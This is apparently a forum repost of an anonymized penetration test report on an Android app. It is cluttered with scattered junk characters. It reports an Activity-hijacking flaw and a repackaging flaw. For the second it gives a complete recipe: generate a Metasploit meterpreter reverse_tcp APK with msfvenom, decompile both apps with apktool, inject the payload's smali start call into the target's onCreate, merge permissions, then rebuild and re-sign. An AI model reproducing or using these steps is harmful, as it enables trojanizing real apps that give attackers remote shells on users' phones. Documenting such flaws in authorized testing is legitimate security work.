原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

5 R8 u7 N4 o* t6 X: w# X 0 a' r( O, {- J c, D+ I
, E, U3 C" S# X9 t9 {, T" y ' ]. G2 S8 K0 }; p% }& h8 t

+ I( B* p0 u2 ?9 [3 X 3 R/ x5 G6 Y) t9 Z" f. n4 I, o) D 文档编号： : m0 ]4 _# `6 f ) T8 P. }" P9 m& D

% g" O4 |, w @. q* Z) I+ M7 p, Y' u 8 J; ?; f. I9 P7 b) j+ h' {7 g2 F 0 J$ `6 g& L$ M' ? 8 g! F/ F! H& F# @

; V7 G' W# C) d1 f) \4 J! B: r- d 5 J; s6 Z8 j4 y: L# j 4 L _* h( P" c" p, b 4 u3 B# S+ C* W' y" m& g) b4 s

" m/ Y9 `2 v* H, \ ( K' t5 ^, i; y$ \% J- q( X 2 M& a( n! h8 E. T# M ( d% I3 v8 ]% u; j/ @

9 Z" a# {0 R; L) ^9 t( S/ e8 Y2 {0 ^7 F1 j+ T; L% K5 G- m 8 Z- O4 q: |" w - n, v" [4 }% z8 }5 l3 c1 t

- `% ~' D2 r& S9 ^8 L3 K9 r& q/ E7 f # E% E b% f6 o4 n8 Q0 ~0 B 9 Y; b% u/ b1 {1 w( @

1 }* J$ J8 q, |4 j& J. n/ C 7 m7 c& d3 ~) x$ U 某某某APP渗透测试 : @1 ~. H; c' h+ ^ , Q" ~# w; z" c& @5 h

. ]4 J7 |# `/ d8 [5 } v $ |; j. p* e" S5 i4 U & \, g1 p$ F; W7 O. X4 H: o8 G- S9 D9 k' s' N6 N5 s

6 E: |* C5 C( \9 {2 W. V1 d# [# o' _ ) u6 k! h4 `$ L3 g; f5 { 8 e/ K7 j: q7 |' j' ^1 M, \ : O% H$ i, i* h$ c+ u- [

. ~1 E. w6 o( T% [2 c }0 A9 E7 [/ N4 W * H6 p3 A! Q9 \ l, B ( I _0 [! r2 K4 o

. k. K* ~' a6 | 7 o4 t1 m# ?: C x) }0 a9 f* j & A, s6 [& D+ z; i( Y F) `+ i, C( Y" C

/ r7 @7 W$ r" `6 R$ T1 M, C* _1 N 7 _+ P0 H" @" W/ |7 ~2 K: N g 技术报告 9 R. R! r( I& N: B: {% F . s$ y* m" v- G: ^ ~; O w$ X# }8 V

" B0 O E+ G% W' y& Q " w& N* v! E3 K( P# n g. ?+ D 0 r3 n8 R7 ?9 Z6 F% _ , ]7 c7 r* y# g$ s; N) n

$ u9 `4 x: w& B8 I: c: G3 I 2 V1 V0 i. Y, ^' x# B # z0 S) {& X. s, e( s 2 Z; R' F5 b( o: n

w6 e+ ~8 a2 W& Z$ U7 ^5 |& ]$ d 6 z3 w3 r- O( u3 J 8 u' m* V5 N- W: m1 L. r * H% E1 v3 `+ B9 U) X& C( z

) a' [! O# @- O, }# b* |7 q6 ^! ]0 g' ? @- G5 L0 _; n ' A/ {' f1 N8 O( S+ }! O " }! R6 M Q# p* C5 L6 i! G

, P, [0 W' N ~! p- K6 m8 z3 _& S* B + _0 K, R& W5 V' Y9 K) C) R 0 S: | ^4 Y. T4 h! R " ^3 r" W& ]' d. B- O w* J

; h% Z5 x* t$ }9 K! B' C" }& |; a, D A3 u 7 z) J$ J" B% ~4 K! r# ^5 }: o0 Q3 g2 ?1 \

2 S. b/ ~8 V: T + {6 b+ ^2 [( ?" p4 T3 } ! q; k( U0 u4 b" a( i9 q6 t* d2 m/ f1 E: m4 x6 V# [$ g E

. X. J" M- n0 g, p 1 m9 F ~' m4 q/ x0 _4 f0 S # m9 ]+ U. m2 |$ v 4 I5 [/ _% p' d6 A6 a% Q

9 y3 ?! H) ?+ F/ g * ^! Q2 T \; m, W - f, h O: W- r% [: c2 E$ U. \ 4 `7 Y( D1 J# `" G! ]

4 ~5 R* k8 M2 G& u6 B5 U- V$ t& I* H5 D2 n1 b) a& ^ / z. I( C9 r6 `% T. ~ % _: U2 c3 x- ^0 Z

8 u0 t# P& l L# H: S% d& u3 x* @ 8 O8 }" g0 E1 I( ^ S% | \% Z3 M2 v n" d. @ $ O: c% z) M; D

3 H0 I* {8 g' g2 X! Y" T + E( o( E9 n6 C& B( a % c" p4 b$ G/ W) t- E ; X/ X" a6 @' j1 u

1 c0 n% }. t5 k- p9 P3 A" o5 P; _ " y0 W. q; f; d/ B ( t: T, a6 N' R# b% t 1 Y! T" k% N. q% ~3 U% U

- a S8 N& v: w 4 e, \. d0 b) c 0 A0 ?/ E! d7 l; G1 H+ I) n6 O) q ' m. N5 `- E- G" Z

* S, Q# A! l1 v, r& q! C' F" q3 q% S( d6 D, P 7 Q! p" o# h1 y5 t+ C 3 x, R- ]9 @* ]/ \

- w! A2 @. Y$ N p3 M8 R9 B. h9 h; M ) m4 A$ ], P* v8 F5 u* t0 | 0 a+ h5 i& C! z% f6 {, ^3 T( Y1 n" v: e4 x# U% F, f

" s G, A. b2 B5 R5 ~& a7 B # g8 J* _1 o7 w. w1 k 0 ]% L0 R: P2 ^ & b5 M7 z8 K' K1 N, T

7 L' C$ B7 Z! H9 K4 g7 _ F+ W! k4 m9 w2 H3 f 3 l9 }* Q% s" r 9 Z8 g, A7 _- G9 U4 e8 r

! V x1 u+ b) S7 ~ - a, @+ \& M: R: u) D 二〇二〇年 8 f8 ?8 y5 E" ], R: e V/ q7 H, i" }+ S* M! j: E9 ~

$ M' b' \: _0 @* |. Y" _ y r+ O2 ~1 D0 U9 G' J( j& D6 F 目录 + i6 \4 Q! T) |/ k0 C( q- @ 6 {2 Q4 k% r7 L: ?( x/ K

: \ r+ N. e/ c+ k9 R9 x 5 F- J/ i" r: P ' g V& x- e: z' i ; o5 x$ k. P7 n# X1 H0 e. z9 @" C

+ G! t$ |$ d$ d3 s8 E( ] 4 c: u8 Z1 s' p* B5 D 1 概述... 3 7 a" s! I9 ]8 k$ m# G 1 _, Q' g- Q0 ]0 _5 J' w

/ d' m0 g S, y! g+ g, | # q% f% b$ M' M# g0 R2 d6 s 1.2测试时间... 3 3 Q# z8 w P& N8 o6 E) ?0 n1 x/ z6 g& _; G& |1 j

& {1 H5 {5 Y$ h; _ 2 w6 h4 d4 S( W1 L. ~ 1.3测试对象... 3 0 `# A- A) I3 X7 [8 ? $ } D. T" g! t0 f9 L

: {3 f6 D2 V! |; a' {- h % U4 c9 r' x' E9 }( \ 1.4测试结果... 3 + N$ y# _0 I' I 2 m6 ?9 A( g* K: l2 u8 M

: \+ z/ Q4 B7 {' f; p1 @1 D * m7 }) a3 Q0 X" r0 I& r* N 2 检测结果... 4 3 u, L9 S) w. V$ c, C, z8 \1 o4 n! i2 @5 U

% i7 N* M& j6 Q- T/ e' v, T( J/ X) f( h/ M. K3 [. e! Z 2.1 某某某... 4 * D( e6 Q0 }$ m: M7 g ( c( c. c% D* e

, ^! f* A |: { ( W; r! X, i7 T5 L1 S: a" L% o9 R0 N; u 2.1.1检测目标... 4 & @2 P7 l+ @5 T# f) U! k! o$ W+ J 7 q" R3 q/ ~' S" ^& b0 I* {1 @

; ~3 k; t. g8 C4 t % A: b) t9 \) ? 2.1.2检测结果... 4 & c! e* {+ E. }/ F) S N1 k* P( c) O2 l) d5 Z

" X8 }- O/ R( X) [ : e9 k& U/ g4 [4 A+ G 2.1.2.1. 4 , V4 D" _3 K7 g. l6 a9 d% c7 D8 b % F, o% n( m5 ^. N; w

/ j6 A5 i T( r8 C \! E$ o# A4 G3 ?- J, Y! d 2.1.2.2. 6 # l+ Z+ X) {8 L: M 6 a7 M) K, d4 c) t; V0 g# |5 R1 w

- T+ s; z- X# I 8 L8 ?% P( b6 w - M) j6 j1 s% Q' ] & t, j. o) ^5 g; B- ~

: z' ^3 y! w, A6 W1 j- S : r) n( m0 D R0 n 1 概述 1 }( ? O! Q" w2 Z" f# p - G y' y) c& e+ }$ D

* s R+ F. D3 ~+ d' h+ _: x/ U( J: B 1.2测试时间 $ n3 r5 w/ k5 ~3 b7 i; S2 o$ z9 Y, w2 R, W

$ `/ k! h: F ?9 j/ W. C; L $ v r1 M6 r6 E/ e6 ^/ n1 O0 \ 6 I% V s R) X( B' _! ?" M$ ~( } - ]: y+ h/ m9 N8 Z0 a 渗透测试时间 p: B. u' g( N2 m: V : R K- S# j# l9 K9 Z* l $ N6 b' A- t8 r" A- W ! P+ x2 y7 p9 o8 g. F( q
/ j! f( t1 b0 f( F' e; \ # k3 n3 l; M1 u ) f$ g) H3 c: A 6 x+ P4 J" h& L/ N2 L8 U1 s% v 起始时间 / e- g4 B- \|: ~$ \/ j ( t! E% v, n; z% Z" T5 h 6 W4 Z; @2 A/ }7 y; r ! w9 m+ G' V, c { B* o; c* }	( e, P9 n6 E0 Z1 I8 U/ w , o8 a# I7 \|& j0 V. d ( \' ]( n' P9 \|- h& P7 `+ } 9 Z3 f' a; E( V R! Z/ P 2020年4月6日 & ^5 \|& @4 W3 H6 \|! U, @7 \|1 ~ Q- d : U0 Q$ { }; N. u$ f ! m* `. \& _* _; Z/ Z
3 n2 @- R7 ]8 }/ x 7 \|0 f6 y! ]3 N9 ? 4 x- W" y# Q% ? ? % z: a9 g; e' v5 K9 ` 结束时间 # Y: E- Q! J' ~- }3 T4 a" J1 h 9 ~( w; D* g" B/ U \|/ M 4 \4 U. b% X$ L5 V. V/ ~ ) ~# Z# f$ C: V$ _	6 c" L1 j, J2 s7 n+ t 4 J5 A1 o" G! d: L, L: x 6 Z, T) ^3 G2 [ + U" f, u, K1 L3 ] 2020年4月9日 ! p0 Z0 k. J) ]' T% V) T$ C6 w; O0 o* ` , h% X( L _$ i3 O" C ' }8 g+ N6 ~* U/ K( E2 ?

; ]: n* o' [) b' B' j ' Y( k" W; K9 }$ b( r 1.3测试对象 9 J7 M M4 w& X3 A" @! ` - T0 {* u8 V. |! C# q; D

9 m7 M5 n+ s, M! U, b$ d$ ~0 s1 p$ B . X% l$ H+ l4 E& r1 ] 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： ! l* f9 O' r" I0 M' H& D; ^9 w, j! g5 }" F+ ?6 R

% T9 N2 P2 Q" P) h : ]6 l) ?$ X3 X' m 表1-1 检测对象 $ M- P3 o& t3 V' u& f, k9 {& ~% V' K7 W9 W- w$ K

% a, A3 J" h6 l( @7 M E; n8 {! l+ u1 ?, k * u& L5 C: C5 K% o0 O" \|* K* F, m3 r" f+ M1 m+ f! s 序号 * _9 y0 D" I$ U* Z3 c ; A6 g" V/ I% ]% M" i 4 _ w+ V8 { r 8 ?+ R- f, j$ G- x; q! B8 k	p( \| c( h! X R0 F' G: [ 1 k) q: C* U2 H$ Z" r( a- m : M# K& ]" y6 W6 v* j) o2 t3 e . H. G' j+ `1 e) B2 M& O% W" C6 ? 测试对象 4 G3 {' G- {8 G# E8 a# W$ p- w% ~, D6 `+ R- Z/ k; ? * A% G& \|; X( h3 { 9 U7 ]" C8 ]; h/ B	, n4 V# }9 v; A, m3 y6 ^# }5 B7 _& q/ _$ _: g : h) @9 \|& E$ K8 w$ } - K: u" Q) `* _; R; _7 Y 测试地址 # ~# G0 O4 \|$ @+ ?" x $ G h3 b* z9 A; I* [ 5 n* g+ {2 C8 u: ^1 Q& \|1 E8 N% n	% G' W& W: \4 W ' C5 q, i: Q2 }8 K ' C: b) w- l4 `% M, K6 G + P9 [0 L1 t: L: Y0 L4 E6 s 安全漏洞 ( a1 C& p. j6 W- S / Z! ]/ F) e$ v, x! A , _. j3 _- u0 `3 z # D$ w8 _6 `/ n! f
; ^% V* C- Z& a% Q, S2 B7 F% p% k9 y % J* `; Q% r& [ - H) p" ` S6 z# a0 s8 s 3 ~+ i+ f; U0 p- t8 t- N% I 1 ; C } q2 ^" O2 } & X$ v8 F g9 N* K4 _0 }7 P5 s; _ ) I4 i( a' B ] 8 s& l. X0 U1 i4 O: v9 B+ t6 T/ M	1 R$ w$ _: w! n 7 f8 @0 C4 {( a & }* e4 D7 S6 b) ]7 C. q- ^ 9 G) v! A8 P0 T/ x$ _ 某某某安卓APP ) c: E: y9 y- x+ s o0 \| % N! V% j: P0 E ( D6 c4 p# \|- [& ? ' I* u7 w( j( q' [* ~. g3 R! Y	% w8 x% n- `% B# [( U+ a , g+ \# k f$ m' z/ ~! e - B) [8 L) g) `) Z1 n$ x7 d8 Q- B( Q9 Y: }1 A3 e" ] # X4 @) M3 i( W8 I6 J 6 ^* H' k0 \) d4 K/ V " Z4 h/ T" W* u! k. S9 k( Y: ?: n/ F) J/ B	" u m# e) Q: ~- o . a: V' F8 C; I% t) v+ F5 b+ T X 2 {4 C: @* `; {! Q- i1 Z ! d) [- C. a' _ h% O0 f. j6 h, Q4 \|: i 2 : U) G, e0 w& n + t7 Q* m* y1 F+ s9 \| - q9 k6 m+ t' }+ _8 i5 z- `- o % }4 h" i9 i; j: F7 Y

$ ~$ W- e0 Y+ g$ J* N9 Y! _: K2 v" m8 b X# k; K }* i, R. o+ d% L 1.4测试结果 / ]6 B- J/ x7 b& n% T, i6 l) Q9 m5 o# e" ~+ q1 M

- X, u6 f1 P, u; r & b7 T* W ]4 k$ A0 I2 A6 i 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： & [6 b2 W+ ~ n, D6 ]! d0 t8 P6 w8 W- P y

, ~ L4 k& W# q5 G( z, f) z 2 E6 V5 @. D* R/ y : ~/ S/ x4 E t' \0 x) W5 g8 X ' I- g, C" ~( f

- l G9 h7 q) p, {! V) E: T1 y' B' |# ?2 Q! H! @0 ?4 [ 序号 0 R4 f ^: G7 y( @- w$ f0 o ! r1 T9 O J: ^9 p5 y+ z

" x* q. M. v- _& A$ F( L" o7 B0 s" ] 系统名称 5 A! d2 I5 C) g5 f2 B8 i * _1 ]/ G' {: R4 X/ a4 X, M) B

1 g2 {7 s: p; B& G- j1 ` . G* O D5 X" s: T 漏洞名称 - F! D4 o2 \3 T 2 `4 _$ \5 `- [

5 ^9 V: Y N6 N% L/ j% R) w @. B4 m8 O9 A3 ?% v# W; h/ ` 漏洞危害 ! N; }. j5 e( i& Q5 D 2 z: N; S; s, Q0 n+ D

, Q, e" R, k6 b8 C6 p9 H ! f. d4 y a0 ]$ l 修复结果 ! p0 c% B' G' t! I3 i2 @! B $ y) k8 R1 [& ?& A# h7 O3 }8 I$ j

# T# n# w* Y" G+ }% s* r* V 3 P! l" m$ |, k2 B$ M. J: }7 ^ 1 + {1 k8 P2 v% |3 a1 Y; M 8 s6 f( j6 x! f+ X, `9 W! Q

/ g; T: i) Q- @$ k) K, U # p9 F5 _0 U' P P/ K 某某某某某某APP 1 I. Y7 O) N7 s* g* k5 O- {" M2 b : a: v: u% k. V5 `- I* i- y- a

; s# U- q' y) b ; X3 X3 }' }5 x0 t Activity 劫持 7 R0 |8 d8 u( X0 S # e; m9 T! b$ Y. t6 o

8 p6 f2 T: T; Z5 d9 K5 F7 u 0 `9 L! b9 E4 u1 t J - o3 L7 K; R# t 9 g7 L# [: U& W. @: {

1 ~7 q! v0 ~8 c8 Y/ W7 D) v# ]( f$ ]5 q* V- T1 X 高 , g8 u0 u( S2 g1 i2 S 5 y/ |5 J4 f4 P- v: ~$ F

. |! D+ I# F6 P' H- V) [ 9 F0 i8 X: F- e" z/ |8 c - A+ ^" J" w; y- r0 Q V7 Y2 x3 N" ?3 B9 S

9 R3 @ V+ g ^; Y( J4 Q ( Q. ]3 l! q0 B 2 " M+ w! V: V/ E) X # f9 u$ y% \. J

: o4 x/ q& Q$ y7 h& Y/ F& \7 c* v$ Q( l/ W" E! E) l% @( C! \ l 某某某某某某APP 7 s# M1 b5 J: U4 {' u ' M5 x! n$ v h9 b2 Y4 m& r

+ w6 G2 V, b j7 v% {. L$ Y% H' f : y% l" d) d- M. r5 q, S; P 反编译二次打包捆绑木马、篡改APP代码 : H( Z. h7 n( ~; m5 o3 D( S0 o & q; Y m* ~" K

: f, E) E9 l- i 6 K! e/ H( Q; \8 D, h, E" X 高 ; x" q& R8 a. _# R/ s: J * ]% v+ u( M0 q2 D+ ?# k2 J5 ^

0 E8 V3 d! L5 q, k, D; b- y6 f, D ( y. N5 f7 P4 M% N0 n: H ! [6 ^6 s0 s# _, k% z 6 l* l# U) d9 D3 i: G

3 M) P9 Z- h9 T: ]2 G }8 R 3 H" m$ d u. E & f/ {+ {+ f7 i& T2 Q + `( ?' d2 r$ X; C

, F" ^* A @$ |& T" z& \ ' |2 O" e/ f& k( u 表1-2 测试结果 * `: w1 g# y7 e& S m $ d: k# ], y8 Z7 Z$ ^# r

& u5 ]: l% V% R: m5 V- d - C+ B) c6 N, U0 D1 z3 N 2 \- o0 Z- m3 J. n2 I7 O6 m * w% r) a" f1 F; f6 o( y( Y. \

" I D9 C- H( i. G1 ^3 u" K. v # D0 ?3 H1 u8 f* F; a 2 检测结果 & Z* X- o4 I9 R7 b/ W9 y 1 K4 i0 ^. n; t2 I) M% w7 x6 S% R; I

" Q# `: i& C+ }% r2 U U0 T" h. s* Z' y! [. i6 O- E3 V 2.1 某某某 & o" D+ k( F( K4 v% S. p. n$ p & _! K4 o Y3 H, ?: {3 Z+ R

) e/ Z/ _7 k5 ?7 c8 ~8 t ( z K3 _- r% w* Q# n& \; s5 p4 r 2.1.1检测目标 - `/ _9 g9 ]5 l9 m: Y2 M 0 i8 @7 I- O! L

4 W8 ?3 ]% @) T! ?3 K! k$ s" e9 ]! I5 G$ p) J' m% @5 S% ^ 目标地址： 某某某某某某APP : t1 o$ i7 Q* c. ~( V3 g' v$ U; V' `6 h7 D

% e, @" U$ p) D: E 4 X/ Z0 E- k# M( p 2.1.2检测结果 ! F; Q' s+ Q7 y1 Q9 E ( _1 P' ~& z" }% {3 p* V/ c

& @+ `% N& p6 b: g# H+ w . _4 T9 Q3 Z" L 2.1.2.1 - \6 P1 O; C8 g& z1 ^0 m & @% ?) D$ N, D; }' o

+ k/ y) G9 L2 x$ ?0 h& }9 J ! `% z7 C8 U& p9 W( q 漏洞链接地址：某某某某某某APP 7 D( B4 q% E, Z7 u! D# Z 4 `: F1 L6 P( }2 }# [

9 Y) c1 k; k% v$ I {( w8 C2 B" k( {: P) b& V1 g / Q# Y; M7 J/ f3 [3 h y* G5 A, @. r. `) Z& O$ e

0 Z2 p2 K N- o' T& L% Y7 a + m7 h7 s. r+ [$ d. O* L: x 漏洞分析及取证： * Z( Q9 ?* `% k, W1 K+ `2 u- B, Q3 e, S/ w+ X" o7 h7 [5 E% N6 m

9 V6 W3 \: N3 d7 k' O8 Q# P' m 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 7 K* b' s' \4 j" R+ \0 m 8 @2 S. k' c7 N4 Q/ n

% ^' g) y% `2 X & b* Z! S& c4 H ! |; V. Z3 m1 w8 C/ l ; m& }) F& W N/ s4 y* S

8 h$ `- P. `2 x! |# Z9 M1 Q9 a % }0 m5 R* ~8 s1 I# c; f0 Q0 S6 t % F# T+ n1 }. p% @1 n5 [5 X0 U+ T7 F8 r0 d5 T( f4 B/ g! y

4 d2 A- P& Y6 E+ V ( J& x. k* G* O% _9 j$ V9 t ! S. j p) B6 o0 M! Q* T. o 5 [- r: k. R/ ~% F, v8 f- p

1 ?% U" G! H/ l; `" K1 r" g8 u & L" D: ^% Q& \3 S* ^: M 1 T- d: ?( B( R/ z ; }5 T+ b5 U& m& g5 p

( w6 _0 L5 Y- `! V: }1 P. E/ q; k8 C7 r9 s4 P. G" | * k( R( V- r+ n # S+ U+ Z# d3 y& l. M1 B1 ]

, z3 S! w! V6 n8 l! [. L& N# t- b5 T) @, F9 Y2 Z+ G* p 漏洞危害：高 7 Y. v/ c- G: h& Z& m( y6 u 5 b k+ A8 O+ V

7 G G# @2 t/ y% z # X3 g" E/ N* H8 H# b A) s* e! z1 W# S3 _8 F8 f . m* B. r5 K9 w) K2 y0 Y 严重程度 1 _% i1 h8 k2 @) V3 V6 I5 s% G: D# {# I) J/ E& s+ U 8 ]2 n! H8 q* r/ G, @ * c4 z" \|4 v8 R2 ]/ c+ o5 T9 W	$ r1 r K/ M, l* v1 S& r4 j" B8 K2 C$ U8 L3 [4 s/ z) o, U7 w5 k ! s* ? h. }- W! M" V4 ~# I5 Y ' q+ M4 L7 \/ L, i4 u/ @+ } 高 : K- n* d5 ]4 m1 Z0 b. F5 w" a8 {& X1 v0 Y 1 X# j" ^" z1 \. ?3 q- ` " i) a. e6 E9 w	) m% Z$ t% m) d' \|, Z x : L) @' B- K! R& Z- A2 J) @; S9 N9 ? ! J6 Q& P1 B: t* K3 n % k0 I+ R2 }- J- r$ b5 r ■ ; g* n! r8 E/ s" `0 _1 P3 S( S# c5 E/ b2 u ; S; h& F) W4 P8 W, d, e7 T. K' ?, A) e2 `" P	6 N' k, Z; F9 r ( B; X- l, [5 j5 A: n& ]3 H9 Z 6 X2 O. F0 c0 o! g# q% _9 S $ N6 ]6 @& z* d: i 中 0 Y- m3 Y6 `. w; C & D. R, }) J. i7 O: V$ Y$ A + E. M, T. c, Z6 Z' Q9 \2 c ! y9 Z0 Z; l9 C	" S$ e( S" k+ ?* @ E* q5 I2 K ! F& b" m* B. w5 t 0 C; y# J9 S( [4 u( L6 b/ m& j2 @! f$ r# }7 z& X & ~ p3 Z3 ^1 ]: ?9 z; x' {: A) N8 w% ^2 r Z& M- w+ ]# k a0 ] % S0 j. g/ h% E' d! H4 z V	# k+ f7 s# q( s# B. M _ B+ T0 C) k* ^9 ~ 5 Y6 n' ]) }& X. G7 X 4 b Z, C8 q; A. h% q 低 7 \|! l4 R6 I H; K! v* o/ e) T9 Z# V1 }0 x/ w9 W # {. P- b* u- L# z4 a4 z; b+ ` 9 a7 _) W! I; j' n! y	# E2 m: ?* ~$ i* H' ` n . Q( c' @. Z+ O8 m1 g 4 Q4 _- n/ i( D3 a2 C 5 U) j" Z4 v+ i, ?8 N5 r : K" f1 w- G P4 q2 O ( Y) v) p$ ?6 r) @( u8 `9 Q* h / b* ]7 l8 O) Z% d, z 0 l( W9 G; `0 o1 U* N. D

' C; ~/ e9 _5 P : ~5 s' k6 z: M ( K$ a h5 y1 y3 ?8 t3 m- \ ! ]9 j6 M" f' z; A4 k* \

$ M% b# a! l0 g; [- q$ x9 i 8 V& G' Z) k2 w2 H 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 # v0 A# u& e, Q- a6 ]% { ' L5 i% s% g b6 [+ K. G; o

- R+ t0 T, g! s% a# U( r G5 a" g* x2 ~7 U4 L7 @0 H2 @- l- m ' h- o* x+ }$ w2 n0 z: h& z {: }7 N) G# d6 N9 ]( I

D* v+ `% j) k5 U# e$ N / I1 f$ i! f! P8 D : G) }9 W4 y9 G+ R6 ? 4 N" Q( i$ U4 e& ?( U1 f# W) s

( R. u& @& k* @( g" t" O# I$ |3 C0 ^; i! b7 D* z 2.1.2.2 6 s# M0 r( v; {4 K- W: H8 ~9 q 6 f& ~/ O% ^: R

; X9 a9 P7 W1 L. R ; A- D5 l5 h8 T 漏洞链接地址：某某某某某某APP `$ V- h+ {% s& L% g9 H: _. a, B) H; \, k

% j4 ]0 B9 U7 I+ b# ?: z0 h ; r$ w. q, E0 [& U: c* L) M: _ 漏洞分析及取证： - p$ Q5 Y3 l$ g " V1 Y# T9 l' a0 }! k$ G# f& h

( N/ M5 [: A; p& o 5 r# x/ N& p& y, t- l! C 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： ! _. F) \' r' Q% |/ ^2 z% [4 ^5 v) N

- L+ H, A$ o2 g2 t) L1 g+ ]( `- H % H# X5 B; C6 I% O3 j 用Metasploit 生成木马 apk " j- R- \( ]3 F# z i 3 R7 }2 d0 J: H6 O, O2 F2 R

3 _1 I% S: r1 z& o# G I$ K j : s0 L! n4 K0 Q3 q1 U4 i8 s4 T msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk + D1 b) v/ q9 S) A6 b: W) n2 w- D2 }* F1 X% d# h

2 l+ I, R* @! y: \4 n1 n( d+ I9 s) q6 @ 反编译目标apk和木马apk & z) q& d5 _) M, y3 `' ?- X* k0 Q : r Q8 h8 a4 ]. v8 |& {- R4 y

+ v4 o. t/ @1 l0 B. z9 ^8 o$ T# g0 X } : ^2 B( z5 J4 D apktool d target.apk
. c5 U( v9 i; E F* N" p8 y. u! D8 k5 Z apktool d cockhorse.apk $ K6 V; b3 x7 C0 u3 a0 l * g* Z' U3 C' W3 W% [; ^1 {

/ I8 ~" u. C6 v 2 I# M B9 U/ A3 [ 木马 apk 注入目标 apk $ q4 _: X; o( m" w2 x7 c % V3 b( R2 @/ ~6 V

- L. {* M w& w$ A: B3 [; a3 s: i, C $ ~1 _ x) A |/ \ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
9 V8 ?0 u, B3 m$ p% C& H/ c& ]! y. b4 q0 L$ G1 p- |8 w0 q* ] invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 9 S6 |8 @! L* N( p6 \& [9 Q6 h% ? - D9 P" H. b& \0 o8 r6 ~

/ h$ U3 u: T. K1 k. N/ I - V }) H+ I& I+ ^1 L2 j 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 & |) A N; ^3 R- b4 o6 f , i# W+ Z2 u9 [# V- |0 P

$ H0 T% g1 Z- s8 h$ b2 Y+ @" E/ n 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 $ i& P3 g3 G( B$ m' e$ u) V" u- o% G3 R9 s( {

4 C) |. }6 E+ ?: p& A6 L" c6 [5 _) {- d2 h. ^' {7 l9 s 回编译生成最终 apk ; N$ n* Q! U5 K' I" C1 x+ C: h. { 6 L" ?7 B7 Y! s) @9 c

+ D) S4 A$ `. J; ?; m& j ) ]+ V: M% C. Z/ ?- n) W 重新打包 7 z% G) p6 j: W; }& E& O! y2 C" f+ w j% v3 P2 W% W* N& a

0 d @8 b3 ]$ z& I) L4 D6 K : V4 C9 Q$ w$ K. D apktool b -o repackage.apk target_app_floder 7 h; J5 r- S2 U3 L& ` $ k# D( R5 a0 [ F) ]

0 s+ K! M9 F( P) b" y5 l7 I( ~5 i5 J3 W5 y n9 h 创建签名文件，有的话可忽略此步骤 3 s1 x/ L% ]7 ^+ ?4 \$ H( A: ~+ U7 G. N4 O" I' c# e9 E

3 y: [" S7 Z' k# n; l: _ . p7 V0 s( ~* | keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 0 a G4 w/ f7 l( e* M% ~ * V3 L6 V/ L$ P! Z5 W

9 C/ R B5 P# y5 X6 H' r5 E% \/ \) Q" F6 @& b$ {$ Y7 w; C" G# c 签名，以下任选其一 5 O3 A5 O& q1 F % w) d% I9 P- S1 L1 U

' T+ a5 t, y" W' _ , `1 P" r! j' e4 o/ E" _- ]0 d jarsigner 方式 0 m0 Y: S& D# o' h4 B. s . A2 Q+ k! ~6 ?8 k) G

& A5 I* T3 ]4 d+ \ + a$ L& z0 {& U+ j8 T3 E jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 6 J3 ^0 n/ t' K/ I* o; E# Y' x& a* S

( n: e' _" G1 u5 _ ! E5 k! G2 `7 K! `& N; w apksigner 方式 4 L- n: P, D; n+ [% Z3 R7 L6 O! {

' C8 {4 Q3 ~+ d e5 M% r& O9 @6 S# \2 `5 B* O9 h apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 2 h' m! N2 s+ }' Q / N$ ~! P) v8 M( ?; g# m: r4 H& v

% F( U5 P$ X, c b4 b/ S8 U" D , [, r; q6 X2 S Z9 C2 _ 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 V# v- X4 c, k* c7 r( c/ M; G- t9 j! O o7 }

6 k" X8 C! o2 `8 M4 d. P " y* C0 h* ]# e) Y6 o& B/ c5 ]2 S 验证，以下任选其一 4 p0 _) n3 R& t j4 x: z ' @- L6 i8 w$ G

0 a0 a7 t9 s4 z9 N. ^& S$ I( e4 c& p7 X& T jarsigner方式 5 z1 S, k4 J- A - x' w/ K% m4 X

6 g5 U; u( a/ O( Q 5 F: o/ r4 Q" A jarsigner -verify repackaged.apk / j. D8 U6 { r. D/ p 8 N% `0 @7 v2 z1 ^: R' Y/ y5 {$ P0 z

\/ J$ d# f7 J m" R& _4 n" X0 E! R& U ( V& G9 ^( j) ~4 r" N c7 C apksigner 方式 : j6 @2 f1 a: t/ ~- N, E, V 3 {8 n) N" X$ r5 Z

# t) F! J0 ^, J. C+ I% k. k% \! K% {8 W; i0 y$ {! u apksigner verify -v --print-certs repackaged.apk # s' ~- @- @% v& x8 p - c% v, A4 \3 @" q" H3 ?0 E

) B0 W3 U+ E3 j, s% | + l/ A$ ?( N. {4 \9 T& L$ F9 l W keytool方式 ' b$ y' b! K2 \% X! ~' w2 x4 a- q$ @- B5 r3 E6 |( f

% Z# k. g: w2 k" a/ o; ~ 3 E" S. b. ]- h/ ?1 ]8 i keytool -printcert -jarfile repackaged.apk 4 x3 B, O% O- A / L" }1 ?0 O; v/ c6 v

* J! h+ b$ ]0 ~/ v1 e 2 }7 D8 Q/ @# ?, H6 E4 B3 }2 @ 对齐 + n. {$ s. X6 E% H8 I6 K+ Q , E9 F' L) b6 T! l. ?& \

